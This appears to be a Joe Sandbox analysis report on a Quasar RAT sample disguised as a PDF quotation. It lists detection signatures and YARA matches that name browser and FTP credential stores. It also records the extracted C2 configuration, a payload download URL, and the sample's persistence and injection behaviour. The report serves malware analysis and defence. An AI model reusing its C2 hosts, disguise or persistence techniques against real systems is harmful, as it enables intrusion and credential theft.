Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
________.exe

Overview

General Information

Sample name:________.exe
renamed because original name is a hash value
Original sample name:PRD10219304 drawing and quotation.pdf_____________________________________________________________________________________.exe
Analysis ID:1559232
MD5:0a82b8151c26e0cff39c459fd4e556ef
SHA1:fce0092d63d3cb2c4271e340d6b44069bc3e02d5
SHA256:979ee36a9c72dab161971310f3b12cb79833838729a69e83d5a5761cfdcdf80f
Tags:exeuser-lowmal3
Infos:

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Suspicious Double Extension File Execution
Yara detected AntiVM3
Yara detected Quasar RAT
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ________.exe (PID: 1812 cmdline: "C:\Users\user\Desktop\________.exe" MD5: 0A82B8151C26E0CFF39C459FD4E556EF)
    • InstallUtil.exe (PID: 6844 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

Threatname: Quasar

{"Version": "1.4.1", "Host:Port": "aboushagor.ydns.eu:6542;", "SubDirectory": "SubDir", "InstallName": "windows update.exe", "MutexName": "0b30f45d-3c54-4926-a32f-8a1dc077eb21", "Tag": "Chim", "LogDirectoryName": "Logs"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2157230652.0000000002805000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
    00000002.00000002.3368690490.0000000000720000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
      00000000.00000002.2186106678.00000000068A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
          00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.________.exe.68a0000.12.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.________.exe.3c4bee0.2.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                0.2.________.exe.3c4bee0.2.unpackMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
                • 0x28d0d8:$x1: Quasar.Common.Messages
                • 0x29d401:$x1: Quasar.Common.Messages
                • 0x2a99fa:$x4: Uninstalling... good bye :-(
                • 0x2ab1ef:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
                0.2.________.exe.3c4bee0.2.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
                • 0x2a8fac:$f1: FileZilla\recentservers.xml
                • 0x2a8fec:$f2: FileZilla\sitemanager.xml
                • 0x2a902e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
                • 0x2a927a:$b1: Chrome\User Data\
                • 0x2a92d0:$b1: Chrome\User Data\
                • 0x2a95a8:$b2: Mozilla\Firefox\Profiles
                • 0x2a96a4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                • 0x2fb628:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                • 0x2a97fc:$b4: Opera Software\Opera Stable\Login Data
                • 0x2a98b6:$b5: YandexBrowser\User Data\
                • 0x2a9924:$b5: YandexBrowser\User Data\
                • 0x2a95f8:$s4: logins.json
                • 0x2a932e:$a1: username_value
                • 0x2a934c:$a2: password_value
                • 0x2a9638:$a3: encryptedUsername
                • 0x2fb56c:$a3: encryptedUsername
                • 0x2a965c:$a4: encryptedPassword
                • 0x2fb58a:$a4: encryptedPassword
                • 0x2fb508:$a5: httpRealm
                0.2.________.exe.3c4bee0.2.unpackMALWARE_Win_QuasarStealerDetects Quasar infostealerditekshen
                • 0x163116:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
                • 0x2a9ae4:$s3: Process already elevated.
                • 0x28cdd7:$s4: get_PotentiallyVulnerablePasswords
                • 0x276e93:$s5: GetKeyloggerLogsDirectory
                • 0x29cb60:$s5: GetKeyloggerLogsDirectory
                • 0x28cdfa:$s6: set_PotentiallyVulnerablePasswords
                • 0x2fcc56:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
                Click to see the 10 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Double Extension File Execution
                Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\________.exe", CommandLine: "C:\Users\user\Desktop\________.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\________.exe, NewProcessName: C:\Users\user\Desktop\________.exe, OriginalFileName: C:\Users\user\Desktop\________.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\user\Desktop\________.exe", ProcessId: 1812, ProcessName: ________.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\SubDir\windows update.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 6844, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost

                Data Obfuscation

                barindex
                Sigma detected: Drops script at startup location
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\________.exe, ProcessId: 1812, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: aboushagor.ydns.euAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000002.00000002.3373655788.0000000002A71000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "aboushagor.ydns.eu:6542;", "SubDirectory": "SubDir", "InstallName": "windows update.exe", "MutexName": "0b30f45d-3c54-4926-a32f-8a1dc077eb21", "Tag": "Chim", "LogDirectoryName": "Logs"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\TypeId.exeReversingLabs: Detection: 57%
                Multi AV Scanner detection for submitted file
                Source: ________.exeReversingLabs: Detection: 57%
                Yara detected Quasar RAT
                Source: Yara matchFile source: 0.2.________.exe.3c4bee0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.________.exe.3c4bee0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2157230652.0000000002805000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3368690490.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ________.exe PID: 1812, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6844, type: MEMORYSTR
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\TypeId.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: ________.exeJoe Sandbox ML: detected
                Source: ________.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.6:49709 version: TLS 1.2
                Source: ________.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: ________.exe, 00000000.00000002.2157123227.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003712000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002A04000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: ________.exe, 00000000.00000002.2157123227.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003712000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002A04000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: ________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: ________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmp

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: aboushagor.ydns.eu
                Yara detected Generic Downloader
                Source: Yara matchFile source: 0.2.________.exe.3c4bee0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.6:49711 -> 155.94.209.8:6542
                Source: global trafficHTTP traffic detected: GET /ewgrh/Rfbybifboaq.dat HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 185.78.221.73 185.78.221.73
                Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /ewgrh/Rfbybifboaq.dat HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: www.oleonidas.gr
                Source: global trafficDNS traffic detected: DNS query: aboushagor.ydns.eu
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://entityframework-plus.net/
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3373655788.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: ________.exe, TypeId.exe.0.drString found in binary or memory: http://www.zzzprojects.com
                Source: ________.exe, 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bulk-operations.net
                Source: ________.exe, TypeId.exe.0.drString found in binary or memory: https://bulk-operations.net/pricing.
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping.
                Source: ________.exe, TypeId.exe.0.drString found in binary or memory: https://dapper-plus.net/pricing.
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/)
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/include-graph).
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/md5-exception
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entityframework-extensions.net/md5-exceptionX
                Source: ________.exe, TypeId.exe.0.drString found in binary or memory: https://entityframework-extensions.net/pricing.
                Source: ________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: ________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: ________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215
                Source: ________.exe, 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is/
                Source: ________.exe, TypeId.exe.0.drString found in binary or memory: https://linqtosql-plus.net/pricing.
                Source: ________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: ________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3373655788.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: ________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: ________.exe, 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oleonidas.gr
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oleonidas.gr/ewgrh/Rfbybifboaq.dat
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.6:49709 version: TLS 1.2

                E-Banking Fraud

                barindex
                Yara detected Quasar RAT
                Source: Yara matchFile source: 0.2.________.exe.3c4bee0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.________.exe.3c4bee0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2157230652.0000000002805000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3368690490.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ________.exe PID: 1812, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6844, type: MEMORYSTR

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.________.exe.3c4bee0.2.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                Source: 0.2.________.exe.3c4bee0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.________.exe.3c4bee0.2.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                Source: 0.2.________.exe.3c4bee0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                Source: 0.2.________.exe.3c4bee0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.________.exe.3c4bee0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_00AD41200_2_00AD4120
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_00ADF2200_2_00ADF220
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_00ADF2100_2_00ADF210
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_00ADDE680_2_00ADDE68
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_00ADDE580_2_00ADDE58
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_00C05AD00_2_00C05AD0
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_00C06C080_2_00C06C08
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_00C05AC10_2_00C05AC1
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_00C06BF80_2_00C06BF8
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_00C046600_2_00C04660
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_00C046700_2_00C04670
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_00C06F780_2_00C06F78
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_070E00060_2_070E0006
                Source: C:\Users\user\Desktop\________.exeCode function: 0_2_070E00400_2_070E0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0293EFE42_2_0293EFE4
                Source: ________.exe, 00000000.00000002.2157123227.0000000000C30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ________.exe
                Source: ________.exe, 00000000.00000002.2196940181.00000000082A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBdjirqh.exe0 vs ________.exe
                Source: ________.exe, 00000000.00000000.2108679772.0000000000142000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBdjirqh.exe0 vs ________.exe
                Source: ________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs ________.exe
                Source: ________.exe, 00000000.00000002.2157230652.0000000002805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs ________.exe
                Source: ________.exe, 00000000.00000002.2170154648.0000000003712000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ________.exe
                Source: ________.exe, 00000000.00000002.2170154648.0000000003712000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBdjirqh.exe0 vs ________.exe
                Source: ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs ________.exe
                Source: ________.exe, 00000000.00000002.2157230652.0000000002A04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ________.exe
                Source: ________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ________.exe
                Source: ________.exe, 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs ________.exe
                Source: ________.exe, 00000000.00000002.2155834281.000000000097E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ________.exe
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs ________.exe
                Source: ________.exeBinary or memory string: OriginalFilenameBdjirqh.exe0 vs ________.exe
                Source: ________.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.________.exe.3c4bee0.2.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                Source: 0.2.________.exe.3c4bee0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.________.exe.3c4bee0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                Source: 0.2.________.exe.3c4bee0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                Source: 0.2.________.exe.3c4bee0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.________.exe.3c4bee0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                Source: 0.2.________.exe.c30000.0.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.________.exe.c30000.0.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.________.exe.c30000.0.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                Source: 0.2.________.exe.c30000.0.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                Source: 0.2.________.exe.c30000.0.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
